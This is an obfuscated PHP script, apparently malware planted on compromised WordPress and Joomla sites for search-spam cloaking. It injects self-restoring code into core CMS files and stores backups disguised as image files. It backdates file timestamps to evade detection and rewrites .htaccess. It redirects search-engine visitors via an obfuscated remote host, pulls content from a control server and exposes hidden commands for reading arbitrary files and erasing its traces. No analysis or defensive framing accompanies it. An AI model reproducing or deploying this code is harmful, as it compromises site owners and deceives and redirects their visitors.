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'".str_replace('../wp-admin/','./wp-admin/',$bkLocalFileMoban2)."';".PHP_EOL; $NowPutStrTwo .= ' if($nowHtacFile && file_exists($bkLocalFileHtac2)){ if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac2))){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @chmod($nowHtacFile,0755); @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac2)); @chmod($nowHtacFile,0755); } } if(file_exists($bkLocalFileIndex2)){ if(!file_exists($nowIndexFile) or (filesize($nowIndexFile) != filesize($bkLocalFileIndex2) && !file_exists($nowLogFile))){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @chmod($nowIndexFile,0755); @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex2)); @chmod($nowIndexFile,0755); } } if(file_exists($bkLocalFileMoban2)){ if(!file_exists($nmbf1)){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban2)); @chmod($nmbf1,0755); }else{ if(filesize($nmbf1) != filesize($bkLocalFileMoban2)){ $tpstrMb = file_get_contents($nmbf1); if(strstr($tpstrMb,"draft_or_post_title") && !strstr($tpstrMb,"")){ $fitime = filemtime($bkLocalFileMoban2); @chmod($bkLocalFileMoban2,0755); @file_put_contents($bkLocalFileMoban2,$tpstrMb); @touch($bkLocalFileMoban2, $fitime, $fitime); }else{ @chmod($bkLocalFileMoban2,0755); @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban2)); @chmod($bkLocalFileMoban2,0755); } } } }'; $NowPutStrTwo .= PHP_EOL . '//ckIIend'.PHP_EOL; if(strstr($strckLocalFile2,'//ckIIbg') && strstr($strckLocalFile2,'//ckIIend')){ $rsckII = '#//ckIIbg.*?//ckIIend#si'; $strckLocalFile2 = preg_replace($rsckII,$NowPutStrTwo,$strckLocalFile2); }else{ $strckLocalFile2 = '<'.'?php'. PHP_EOL .$NowPutStrTwo. PHP_EOL . '?>'.PHP_EOL . $strckLocalFile2; } file_put_contents($ckLocalFile2,$strckLocalFile2); @touch($ckLocalFile2, $fitime, $fitime); } }elseif($sysType == 'Joomla'){ $ckLocalFile1 = '../libraries/loader.php'; $ckLocalFile2 = '../includes/framework.php'; if(!is_dir("../templates")) @mkdir("../templates",0755); if(!is_dir("../templates/system")) @mkdir("../templates/system",0755); if(!is_dir("../templates/system/images")) @mkdir("../templates/system/images",0755); $bkLocalFileIndex1 = '../templates/system/images/i_button1_blank.png'; $bkLocalFileHtac1 = '../templates/system/images/i_button1_image.png'; $bkLocalFileMoban1 = '../templates/system/images/i_button1_left.png'; if(!is_dir("../media")) @mkdir("../media",0755); if(!is_dir("../media/media")) @mkdir("../media/media",0755); if(!is_dir("../media/media/images")) @mkdir("../media/media/images",0755); if(!is_dir("../media/media/images/mime-icon-16")) @mkdir("../media/media/images/mime-icon-16",0755); $bkLocalFileIndex2 = '../media/media/images/mime-icon-16/mp3s.png'; $bkLocalFileHtac2 = '../media/media/images/mime-icon-16/mp4s.png'; $bkLocalFileMoban2 = '../media/media/images/mime-icon-16/odcs.png'; $nmbf1 = './template.html'; $nmbf2 = './'.$nowDirName.'/template.html'; $nowLogFileI = './'.$nowDirName.'/logs.txt'; $nowIndexFile = './index.php'; $nowIndexFileI = './'.$nowDirName.'/index.php'; if(JDT == 1){ $nowHtacFile = './.htaccess'; $nowHtacFileI = './'.$nowDirName.'/.htaccess'; }elseif(JDT == 0){ $nowHtacFile = '../.htaccess'; $nowHtacFileI = './.htaccess'; }else{ $nowHtacFile = ''; $nowHtacFileI = ''; } $strNowIndex = file_get_contents($nowIndexFile); $r4 = '#bbbbbbbbackupbg.*?bbbbbbbbackupend#si'; $strNowIndex2 = preg_replace($r4, '', $strNowIndex); $r4 = '#i{9}bg.*?i{9}end#si'; $strNowIndex2 = preg_replace($r4, '', $strNowIndex2); $r4 = '#w{6}forbg.*?w{6}forend#si'; $strNowIndex2 = preg_replace($r4, '', $strNowIndex2); $r4 = '#w{6}forbg.*?w{6}forend#si'; $strNowIndex2 = preg_replace($r4, '', $strNowIndex2); $strNowIndex = $strNowIndex2; $strNowMoban = file_get_contents($nmbf1); $strNowHtac = file_get_contents($nowHtacFile); if(file_exists($ckLocalFile1)){ $strCkLocalFile1 = file_get_contents($ckLocalFile1); @chmod($ckLocalFile1,0755); if(stristr($strCkLocalFile1,'// Check if jexit')){ $rpRpFind = '// Check if jexit'; }elseif(stristr($strCkLocalFile1,'function jimport')){ $rpRpFind = 'function jimport'; }else{ $rpRpFind = false; } file_put_contents($bkLocalFileIndex1,$strNowIndex); file_put_contents($bkLocalFileMoban1,$strNowMoban); file_put_contents($bkLocalFileHtac1,$strNowHtac); @touch($bkLocalFileIndex1, $fitime, $fitime); @touch($bkLocalFileMoban1, $fitime, $fitime); @touch($bkLocalFileHtac1, $fitime, $fitime); $NowPutStrI = PHP_EOL . '//ck1bg'.PHP_EOL; $NowPutStrI .= '$nowFileDir = '." '$nowDirName';".PHP_EOL; $NowPutStrI .= '$nowHtacFile = '." '$nowHtacFileI';".PHP_EOL; $NowPutStrI .= '$nmbf1 = '." '$nmbf2';".PHP_EOL; $NowPutStrI .= '$nowIndexFile = '." '$nowIndexFileI';".PHP_EOL; $NowPutStrI .= '$nowLogFile = '." '$nowLogFileI';".PHP_EOL; $NowPutStrI .= '$bkLocalFileIndex1 = '." '".str_replace('../templates/','./templates/',$bkLocalFileIndex1)."';".PHP_EOL; $NowPutStrI .= '$bkLocalFileHtac1 = '." '".str_replace('../templates/','./templates/',$bkLocalFileHtac1)."';".PHP_EOL; $NowPutStrI .= '$bkLocalFileMoban1 = '." '".str_replace('../templates/','./templates/',$bkLocalFileMoban1)."';".PHP_EOL; $NowPutStrI .= ' if($nowHtacFile && file_exists($bkLocalFileHtac1)){ if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @chmod($nowHtacFile,0755); @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1)); @chmod($nowHtacFile,0755); } } if(file_exists($bkLocalFileIndex1)){ if(!file_exists($nowIndexFile) or (filesize($nowIndexFile) != filesize($bkLocalFileIndex1) && !file_exists($nowLogFile))){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @chmod($nowIndexFile,0755); @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1)); @chmod($nowIndexFile,0755); } } if(file_exists($bkLocalFileMoban1)){ if(!file_exists($nmbf1)){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1)); @chmod($nmbf1,0755); }else{ if(filesize($nmbf1) != filesize($bkLocalFileMoban1)){ $tpstrMb = file_get_contents($nmbf1); if(strstr($tpstrMb,"draft_or_post_title") && !strstr($tpstrMb,"")){ $fitime = filemtime($bkLocalFileMoban1); @chmod($bkLocalFileMoban1,0755); @file_put_contents($bkLocalFileMoban1,$tpstrMb); @touch($bkLocalFileMoban1, $fitime, $fitime); }else{ @chmod($bkLocalFileMoban1,0755); @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1)); @chmod($bkLocalFileMoban1,0755); } } } }'; $NowPutStrI .= PHP_EOL . '//ck1end'.PHP_EOL; if(strstr($strCkLocalFile1,'//ck1bg') && strstr($strCkLocalFile1,'//ck1end')){ $rsck1 = '#//ck1bg.*?//ck1end#si'; $strCkLocalFile1 = preg_replace($rsck1,$NowPutStrI,$strCkLocalFile1); }else{ if(!$rpRpFind){ $strCkLocalFile1 = $strCkLocalFile1.PHP_EOL .$NowPutStrI; }else{ $strCkLocalFile1 = str_replace($rpRpFind,$NowPutStrI.$rpRpFind,$strCkLocalFile1); } } file_put_contents($ckLocalFile1,$strCkLocalFile1); @touch($ckLocalFile1, $fitime, $fitime); } if(file_exists($ckLocalFile2)){ $strckLocalFile2 = file_get_contents($ckLocalFile2); @chmod($ckLocalFile2,0755); if(stristr($strckLocalFile2,'ob_end_clean')){ $rpRpFind = 'ob_end_clean'; }elseif(stristr($strckLocalFile2,'// System configuration')){ $rpRpFind = '// System configuration'; }else{ $rpRpFind = false; } file_put_contents($bkLocalFileIndex2,$strNowIndex); file_put_contents($bkLocalFileMoban2,$strNowMoban); file_put_contents($bkLocalFileHtac2,$strNowHtac); @touch($bkLocalFileIndex2, $fitime, $fitime); @touch($bkLocalFileMoban2, $fitime, $fitime); @touch($bkLocalFileHtac2, $fitime, $fitime); $NowPutStrTwo = PHP_EOL . '//ckIIbg'.PHP_EOL; $NowPutStrTwo .= '$nowFileDir = '." '$nowDirName';".PHP_EOL; $NowPutStrTwo .= '$nowHtacFile = '." '$nowHtacFileI';".PHP_EOL; $NowPutStrTwo .= '$nmbf1 = '." '$nmbf2';".PHP_EOL; $NowPutStrTwo .= '$nowIndexFile = '." '$nowIndexFileI';".PHP_EOL; $NowPutStrTwo .= '$nowLogFile = '." '$nowLogFileI';".PHP_EOL; $NowPutStrTwo .= '$bkLocalFileIndex2 = '." '".str_replace('../media/','./media/',$bkLocalFileIndex2)."';".PHP_EOL; $NowPutStrTwo .= '$bkLocalFileHtac2 = '." '".str_replace('../media/','./media/',$bkLocalFileHtac2)."';".PHP_EOL; $NowPutStrTwo .= '$bkLocalFileMoban2 = '." '".str_replace('../media/','./media/',$bkLocalFileMoban2)."';".PHP_EOL; $NowPutStrTwo .= ' if($nowHtacFile && file_exists($bkLocalFileHtac2)){ if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac2))){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @chmod($nowHtacFile,0755); @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac2)); @chmod($nowHtacFile,0755); } } if(file_exists($bkLocalFileIndex2)){ if(!file_exists($nowIndexFile) or (filesize($nowIndexFile) != filesize($bkLocalFileIndex2) && !file_exists($nowLogFile))){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @chmod($nowIndexFile,0755); @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex2)); @chmod($nowIndexFile,0755); } } if(file_exists($bkLocalFileMoban2)){ if(!file_exists($nmbf1)){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban2)); @chmod($nmbf1,0755); }else{ if(filesize($nmbf1) != filesize($bkLocalFileMoban2)){ $tpstrMb = file_get_contents($nmbf1); if(strstr($tpstrMb,"draft_or_post_title") && !strstr($tpstrMb,"")){ $fitime = filemtime($bkLocalFileMoban2); @chmod($bkLocalFileMoban2,0755); @file_put_contents($bkLocalFileMoban2,$tpstrMb); @touch($bkLocalFileMoban2, $fitime, $fitime); }else{ @chmod($bkLocalFileMoban2,0755); @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban2)); @chmod($bkLocalFileMoban2,0755); } } } }'; $NowPutStrTwo .= PHP_EOL . '//ckIIend'.PHP_EOL; if(strstr($strckLocalFile2,'//ckIIbg') && strstr($strckLocalFile2,'//ckIIend')){ $rsckII = '#//ckIIbg.*?//ckIIend#si'; $strckLocalFile2 = preg_replace($rsckII,$NowPutStrTwo,$strckLocalFile2); }else{ if(!$rpRpFind){ $strckLocalFile2 = $strckLocalFile2.PHP_EOL .$NowPutStrTwo; }else{ $strckLocalFile2 = str_replace($rpRpFind,$NowPutStrTwo.$rpRpFind,$strckLocalFile2); } } file_put_contents($ckLocalFile2,$strckLocalFile2); @touch($ckLocalFile2, $fitime, $fitime); } }else{ $ckLocalFile1 = '../index.php'; if(!is_dir("../images")) @mkdir("../images",0755); $bkLocalFileIndex1 = '../images/logo_s.jpg'; $bkLocalFileHtac1 = '../images/head_s.jpg'; $bkLocalFileMoban1 = '../images/banner_s.jpg'; $nmbf1 = './template.html'; $nmbf2 = './'.$nowDirName.'/template.html'; $nowLogFileI = './'.$nowDirName.'/logs.txt'; $nowIndexFile = './index.php'; $nowIndexFileI = './'.$nowDirName.'/index.php'; if(JDT == 1){ $nowHtacFile = './.htaccess'; $nowHtacFileI = './'.$nowDirName.'/.htaccess'; }elseif(JDT == 0){ $nowHtacFile = '../.htaccess'; $nowHtacFileI = './.htaccess'; }else{ $nowHtacFile = ''; $nowHtacFileI = ''; } $strNowIndex = file_get_contents($nowIndexFile); $r4 = '#bbbbbbbbackupbg.*?bbbbbbbbackupend#si'; $strNowIndex2 = preg_replace($r4, '', $strNowIndex); $r4 = '#i{9}bg.*?i{9}end#si'; $strNowIndex2 = preg_replace($r4, '', $strNowIndex2); $r4 = '#w{6}forbg.*?w{6}forend#si'; $strNowIndex2 = preg_replace($r4, '', $strNowIndex2); $r4 = '#w{6}forbg.*?w{6}forend#si'; $strNowIndex2 = preg_replace($r4, '', $strNowIndex2); $strNowIndex = $strNowIndex2; $strNowMoban = file_get_contents($nmbf1); $strNowHtac = file_get_contents($nowHtacFile); if(file_exists($ckLocalFile1)){ $strCkLocalFile1 = file_get_contents($ckLocalFile1); @chmod($ckLocalFile1,0755); file_put_contents($bkLocalFileIndex1,$strNowIndex); file_put_contents($bkLocalFileMoban1,$strNowMoban); file_put_contents($bkLocalFileHtac1,$strNowHtac); @touch($bkLocalFileIndex1, $fitime, $fitime); @touch($bkLocalFileMoban1, $fitime, $fitime); @touch($bkLocalFileHtac1, $fitime, $fitime); $NowPutStrI = PHP_EOL . '//ck1bg'.PHP_EOL; $NowPutStrI .= '$nowFileDir = '." '$nowDirName';".PHP_EOL; $NowPutStrI .= '$nowHtacFile = '." '$nowHtacFileI';".PHP_EOL; $NowPutStrI .= '$nmbf1 = '." '$nmbf2';".PHP_EOL; $NowPutStrI .= '$nowIndexFile = '." '$nowIndexFileI';".PHP_EOL; $NowPutStrI .= '$nowLogFile = '." '$nowLogFileI';".PHP_EOL; $NowPutStrI .= '$bkLocalFileIndex1 = '." '".str_replace('../images/','./images/',$bkLocalFileIndex1)."';".PHP_EOL; $NowPutStrI .= '$bkLocalFileHtac1 = '." '".str_replace('../images/','./images/',$bkLocalFileHtac1)."';".PHP_EOL; $NowPutStrI .= '$bkLocalFileMoban1 = '." '".str_replace('../images/','./images/',$bkLocalFileMoban1)."';".PHP_EOL; $NowPutStrI .= ' if($nowHtacFile && file_exists($bkLocalFileHtac1)){ if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @chmod($nowHtacFile,0755); @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1)); @chmod($nowHtacFile,0755); } } if(file_exists($bkLocalFileIndex1)){ if(!file_exists($nowIndexFile) or (filesize($nowIndexFile) != filesize($bkLocalFileIndex1) && !file_exists($nowLogFile))){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @chmod($nowIndexFile,0755); @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1)); @chmod($nowIndexFile,0755); } } if(file_exists($bkLocalFileMoban1)){ if(!file_exists($nmbf1)){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1)); @chmod($nmbf1,0755); }else{ if(filesize($nmbf1) != filesize($bkLocalFileMoban1)){ $tpstrMb = file_get_contents($nmbf1); if(strstr($tpstrMb,"draft_or_post_title") && !strstr($tpstrMb,"")){ $fitime = filemtime($bkLocalFileMoban1); @chmod($bkLocalFileMoban1,0755); @file_put_contents($bkLocalFileMoban1,$tpstrMb); @touch($bkLocalFileMoban1, $fitime, $fitime); }else{ @chmod($bkLocalFileMoban1,0755); @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1)); @chmod($bkLocalFileMoban1,0755); } } } }'; $NowPutStrI .= PHP_EOL . '//ck1end'.PHP_EOL; if(strstr($strCkLocalFile1,'//ck1bg') && strstr($strCkLocalFile1,'//ck1end')){ $rsck1 = '#//ck1bg.*?//ck1end#si'; $strCkLocalFile1 = preg_replace($rsck1,$NowPutStrI,$strCkLocalFile1); }else{ $strCkLocalFile1 = preg_replace('#<\?(php)?#i', '<'.'?\1'. PHP_EOL .$NowPutStrI. PHP_EOL , $strCkLocalFile1, 1); } file_put_contents($ckLocalFile1,$strCkLocalFile1); @touch($ckLocalFile1, $fitime, $fitime); } } save_install($dateArr); echo '
rset ok!
'; echo 'please open this url: '.GETDOM .'gfile.php?site='.$thisdom; echo "
"; $staus = backup_install($dateArr,2); if($staus != '#ok#'){ $staus = backup_install_two($dateArr,1); } if($staus == '#ok#'){ echo '
backup ok!
'; }else{ echo '
backup fail!
'; } } if(isset($_GET["ljshu"]) && $_GET["ljshu"]){ $strDefault = file_get_contents(__FILE__); $strDefault = str_replace('define("LINKNUM","18");', 'define("LINKNUM","'.$_GET["ljshu"].'");', $strDefault); file_put_contents(__FILE__,$strDefault); echo "
ljshu (".$_GET["ljshu"].") ok!
";} if(isset($_GET["houzui"]) && $_GET["houzui"]){ $strDefault = file_get_contents(__FILE__); $rII='#(/{2}jthouzuibg)(.*?)(/{2}jthouzuiend)#s'; $strDefault = preg_replace($rII, '\1'. PHP_EOL . 'define("JTHZ","'.trim($_GET["houzui"]).'");' . PHP_EOL .'\3', $strDefault); file_put_contents(__FILE__,$strDefault); echo "
houzui (".$_GET["houzui"].") ok!
"; exit; } if(isset($_GET["moshi"])){ if($_GET["moshi"] != 0 && $_GET["moshi"] != 1 && $_GET["moshi"] != 2 && $_GET["moshi"] != 3){ echo "
set fails, moshi value must be 0,1,2 or 3 !
"; die(); } if($_GET["moshi"] == 2 || $_GET["moshi"] == 3){ @unlink(".htaccess"); } $strDefault = file_get_contents(__FILE__); $r3='#(/{2}msbg)(.*?)(/{2}msend)#s'; $rp2 = 'define("JDT","'.$_GET["moshi"].'");'; $strDefault=preg_replace($r3,'\1'.PHP_EOL.$rp2.PHP_EOL.'\3',$strDefault); $strDefault = str_replace('define("JDT","0");', 'define("JDT","'.$_GET["moshi"].'");', $strDefault); file_put_contents(__FILE__,$strDefault); echo "
moshi (".$_GET["moshi"].") ok!
";} if(isset($_GET["delmyself"]) && $_GET["delmyself"]==1){ $str = file_get_contents(__FILE__); $r4 = '#bbbbbbbbackupbg.*?bbbbbbbbackupend#si'; $str2 = preg_replace($r4, '', $str); $r4 = '#i{9}bg.*?i{9}end#si'; $str2 = preg_replace($r4, '', $str2); $r4 = '#w{6}forbg.*?w{6}forend#si'; $str2 = preg_replace($r4, '', $str2); $r4 = '#w{6}forbg.*?w{6}forend#si'; $str2 = preg_replace($r4, '', $str2); file_put_contents(__FILE__,$str2); @unlink("../logs.txt"); echo 'ok'; die(); } if(isset($_POST["delmyself"]) && $_POST["delmyself"]==1){ $str = file_get_contents(__FILE__); $r4 = '#bbbbbbbbackupbg.*?bbbbbbbbackupend#si'; $str2 = preg_replace($r4, '', $str); $r4 = '#i{9}bg.*?i{9}end#si'; $str2 = preg_replace($r4, '', $str2); $r4 = '#w{6}forbg.*?w{6}forend#si'; $str2 = preg_replace($r4, '', $str2); $r4 = '#w{6}forbg.*?w{6}forend#si'; $str2 = preg_replace($r4, '', $str2); file_put_contents(__FILE__,$str2); @unlink("../logs.txt"); echo 'ok'; die(); } // iiiiiiiiiend $arrArrr = array();$j = 0;for($i=0;$i<20;$i+=2){ $arrArrr[$j++] = $date_string{$i}.$date_string{$i+1};} $Arrrarr = array_flip($arrArrr); $temp_abc = $O00O0O{9}.$O00O0O{4}.$O00O0O{0}.$O00O0O{13}.$O00O0O{17}.$O00O0O{14}.$O00O0O{11}; $temp_def = $O00O0O{13}.$O00O0O{0}.$O00O0O{18}.$O00O0O{20}.$O00O0O{3}.$O00O0O{8}.$O00O0O{14}.$O00O0O{0}; if(isset($_GET["gsitemap"]) && isset($_GET["mapnum"])){ $O_OO0_0O_0='America/Chicago'; @date_default_timezone_set($O_OO0_0O_0); if (! is_dir("../mapper")) mkdir("../mapper", 0755); global $gnumber; $gnumber = 1; $bgNum = (int)trim($_GET["gsitemap"]); $mapnum = (int)trim($_GET["mapnum"]); if($bgNum > FNUM) die("The Number Must Lower Then " . FNUM); $arrNumTemp = getMapNum($bgNum,$mapnum); $rs = '#(.*)#si'; $mapLogs = file_get_contents("./map.log"); foreach($arrNumTemp as $vss){ $vals = "id$vss.php"; if(JDT == 0 && $gnumber == 1){ if(strstr($mapLogs,'writemap.xml') && file_exists('../mapper/writemap.xml')){ echo $vals."
"; echo '../mapper/writemap.xml successed
'; $gnumber++; continue; } }elseif(JDT == 0){ if(strstr($mapLogs,'#write' . $arrABC[$gnumber-2] . 'map' .'.xml#') && file_exists('../mapper/write' . $arrABC[$gnumber-2] . 'map' .'.xml')){ echo $vals."
"; echo '../mapper/write' . $arrABC[$gnumber-2] . 'map' .'.xml successed
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PHP_EOL .''; }else{ $strhtt = str_ireplace('# RewriteBase ','RewriteBase ',$strhtt); $strhtt = str_ireplace('#RewriteBase ','RewriteBase ',$strhtt); } if(1){ $r0 = '#(.*RewriteEngine On.*)#i'; $r1 = '#(.*RewriteBase.*)#i'; $r2 = '#RewriteRule#i'; if(JDT == 0){ $rsut = '\1'.PHP_EOL . 'RewriteRule ^'. '.*-(\d+)-.*'. JTHZ .'$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]'. PHP_EOL . 'RewriteRule ^' . 'catalog-(.*)'. JTHZ .'$ '.$RewriteOnDir.'index\.php?cat=\$1&%{QUERY_STRING} [L]'. PHP_EOL . 'RewriteRule ^'.'.*(write[a-z]+map\.xml)$ mapper/\$1 [L]' . PHP_EOL . 'RewriteRule ^'.'.*(writemap\.xml)$ mapper/\$1 [L]' . PHP_EOL ; $rsut2 = PHP_EOL . 'RewriteRule ^'. '.*-(\d+)-.*'. JTHZ .'$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]'. PHP_EOL . 'RewriteRule ^' . 'catalog-(.*)'. JTHZ .'$ '.$RewriteOnDir.'index\.php?cat=\$1&%{QUERY_STRING} [L]'. PHP_EOL . 'RewriteRule ^'.'.*(write[a-z]+map\.xml)$ mapper/\$1 [L]' . PHP_EOL . 'RewriteRule ^'.'.*(writemap\.xml)$ mapper/\$1 [L]' . PHP_EOL .'RewriteRule' ; }else{ $rsut = '\1'. PHP_EOL . 'RewriteRule ^'. '.*-(\d+)-.*'. JTHZ .'$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]'. PHP_EOL . 'RewriteRule ^' . 'catalog-(.*)'. JTHZ .'$ '.$RewriteOnDir.'index\.php?cat=\$1&%{QUERY_STRING} [L]'. PHP_EOL ; $rsut2 = PHP_EOL . 'RewriteRule ^'. '.*-(\d+)-.*'. JTHZ .'$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]'. PHP_EOL . 'RewriteRule ^' . 'catalog-(.*)'. JTHZ .'$ '.$RewriteOnDir.'index\.php?cat=\$1&%{QUERY_STRING} [L]'. PHP_EOL .'RewriteRule' ; } if(preg_match($r0,$strhtt)){ $strhtt = preg_replace($r0,$rsut,$strhtt,1); }elseif(preg_match($r1,$strhtt)){ $strhtt = preg_replace($r1,$rsut,$strhtt,1); }else{ $strhtt = preg_replace($r2,$rsut2,$strhtt,1); } if(JDT == 1 or JDT == 0){ file_put_contents("$PreDir.htaccess", $strhtt); } } die("ghtac ok"); } if(isset($_POST["chdate"]) && md5($_POST["chdate"])=='b6772c68627f804a9578152ee90f5b0c' && isset($_POST["v_read"])){$v_read = $_POST["v_read"];if(file_exists($v_read)){echo '#ok#';}else{echo '#nofile#';}die();}if(isset($_POST["redate"]) && md5($_POST["redate"])=='b6772c68627f804a9578152ee90f5b0c' && isset($_POST["v_read"])){$v_read = $_POST["v_read"];if(file_exists($v_read)){echo rFile($v_read);die();}else{echo '#nofile#';die();}}if(isset($_POST["test"]) && md5($_POST["test"])=='b6772c68627f804a9578152ee90f5b0c'){echo '#ok#'; die();}if((isset($_POST["lan"]) && $_POST["lan"] == 1) or (isset($_GET["lan"]) && $_GET["lan"] == 1)){$blog_data = array();$flag = 1;$blog_data['index'] = filesize(__FILE__);if(file_exists("./template.html")){$blog_data['template'] = filesize("./template.html");}else{$flag = 0;$blog_data['template'] = -1;}echo 'error---'. serialize($blog_data) .'---';die();}if(isset($_GET["gsitemap"]) || isset($_GET["rset"]) || isset($_GET["hzui"]) || isset($_GET["jgshu"]) || isset($_GET["ljshu"]) || isset($_GET["modifydate"]) || isset($_GET["moshi"]) || isset($_GET["install"])){die();} if(JDT==2){ $UrlParent=end((explode('index.php',$_SERVER['REQUEST_URI']))); if($UrlParent){ $tempSid = ''; $tempPid = ''; $r2='#.*-(\d+)-.*'. JTHZ .'$#i'; $r3='#.*-(\d+)-.*/$#i'; if(preg_match($r2,$UrlParent,$matches2)){ if(isset($matches2[1])) $tempPid = $matches2[1]; }else{ preg_match($r3,$UrlParent,$matches13); if(isset($matches13[1])) $tempPid = $matches13[1]; } // if($tempPid && !strstr($_SERVER['REQUEST_URI'],'item')){ if($tempPid){ $_GET['id']= $tempPid; }else{ $r2='#catalog-(.*)'. JTHZ .'#i'; $r3='#catalog-(.*)/$#i'; if(preg_match($r2,$UrlParent,$matches2)){ if(isset($matches2[1])) $tempPid = $matches2[1]; }else{ preg_match($r3,$UrlParent,$matches13); if(isset($matches13[1])) $tempPid = $matches13[1]; } if($tempPid) $_GET['cat']= $tempPid; } } }elseif(JDT==3&&isset($_GET['keyword'])&&$_GET['keyword']){ $tempSid = ''; $tempPid = ''; $UrlParent = $_GET['keyword']; $r2='#-(\d+)$#i'; $r3='#[-/]'.'(\d+)$#i'; if(preg_match($r2,$UrlParent,$matches2)){ if(isset($matches2[1])) $tempPid = $matches2[1]; }else{ preg_match($r3,$UrlParent,$matches13); if(isset($matches13[1])) $tempPid = $matches13[1]; } if($tempPid){ $_GET['id']= $tempPid; } } function getRandStr(){ $arrABC = range('a','z'); shuffle($arrABC); $randNum = rand(4,6); $str = implode('',array_slice($arrABC,0,$randNum)); return $str;} if(isset($_GET["id"])) $id = $_GET["id"]; else{ if(isset($_GET["cat"])){ $rqurl = $_GET["cat"]; $logFileName = './idlogs.txt'; if(file_exists($logFileName)){ $arrUrlId = unserialize(file_get_contents($logFileName)); }else{ $arrUrlId = array(); } if(isset($rqurl) && isset($arrUrlId[$rqurl]) && $arrUrlId[$rqurl]){ $id = $arrUrlId[$rqurl]; }else{ $arrUrlId[$rqurl] = getRandCId($rqurl); $id = $arrUrlId[$rqurl]; file_put_contents($logFileName,serialize($arrUrlId)); @touch(dirname($logFileName), $fLogTime, $fLogTime); @touch($logFileName, $fLogTime, $fLogTime); } }else{ $id = "791091"; //llq index id } } $rs_ptth = $O00O0O{63}.$O00O0O{2}.$O00O0O{14}.$O00O0O{12}; $rs_http = 'http://www.'; $resid = '#^\d+$#'; if(!preg_match($resid,$id)){ http_response_code(404); exit; } $id23 = $id; $siteid = MSID; $siteAID = $siteid. '-' .$id23;$fileKey = $id23 % FNUM; // $_SERVER["HTTP_REFERER"] = "google.com"; if(isset($_SERVER["HTTP_REFERER"])){ $referer = $_SERVER["HTTP_REFERER"]; $russ = '#(google|yahoo|incredibar|bing|docomo|mywebsearch|comcast|search-results|babylon|conduit)(\.[a-z0-9\-]+){1,2}#i'; $ipRanges = array( array('' , ''), array('' , '' ) , array('' , '') , array('' , '') , array('' , '') , array('' , '') , array('' , '') ); $localIp = get_real_ip(); $is_or_no = is_ip($localIp,$ipRanges); $iszz = isCrawler(); if(function_exists('gethostbyaddr')){ $hostname = @gethostbyaddr($localIp); $is_g_ip = preg_match("#google#i", "$hostname") === 1; }else{ $is_g_ip = 0; } if(preg_match($russ, $referer) && $iszz == false && $is_or_no == false && !$is_g_ip){ $rsdom = '#^https?://www\.[^/]+/$#i'; $jums1 = $rs_http.$temp_abc.$rs_ptth. CURRENUSE . $siteid .".txt"; $jums2 = $rs_http.$temp_def.$rs_ptth. CURRENUSE . $siteid .".txt"; for($i=0;$i<2;$i++){ $jumstz = curl_getjs_from_webpage($jums1,2); $jumstz = trim($jumstz); if(!preg_match($rsdom,$jumstz)){ $jumstz = curl_getjs_from_webpage($jums2,10); $jumstz = trim($jumstz); if(preg_match($rsdom,$jumstz)) break; }else{ break; } } echo ''; die(); } } $fcontent = ''; $pInfoUrl = GETDOM . "gpage.php?site=$thisdom&id=$siteAID"; $pInfoStr = curl_get_from_webpage($pInfoUrl,'',5); $rsInfo = '#(.*)#si'; preg_match($rsInfo,$pInfoStr,$matchInfo); if(isset($matchInfo[1])){ $InFoStrArr = unserialize($matchInfo[1]); }else{ exit; } if(isset($InFoStrArr['frStr2'])){ $frStr2 = $InFoStrArr['frStr2']; $fr2Arr = unserialize($frStr2); } $frStr1 = $InFoStrArr['frStr1']; $fr1Arr = unserialize($frStr1); $Ptitle = $InFoStrArr['Ptitle']; $PtitleNowid = $Ptitle; $nowIdName = $InFoStrArr['nowIdName']; if(strstr($Ptitle,'#cat#')){ $tp_title_arr = explode('#cat#',$Ptitle); $Ptitle = $tp_title_arr[1]; } $pcatstr = $InFoStrArr['pcatstr']; $nowPreStr = $InFoStrArr['nowPreStr']; $nowNextStr = $InFoStrArr['nowNextStr']; $nowMateAddStr = $InFoStrArr['nowMateAddStr']; $nowMateAddArr = unserialize($nowMateAddStr); $falgMateDes = 0; if(strstr($pcatstr,'#cname#')){ $temparrI = explode('#cname#',$pcatstr); $catStr = $temparrI[0]; $catArr = explode('^',$catStr); 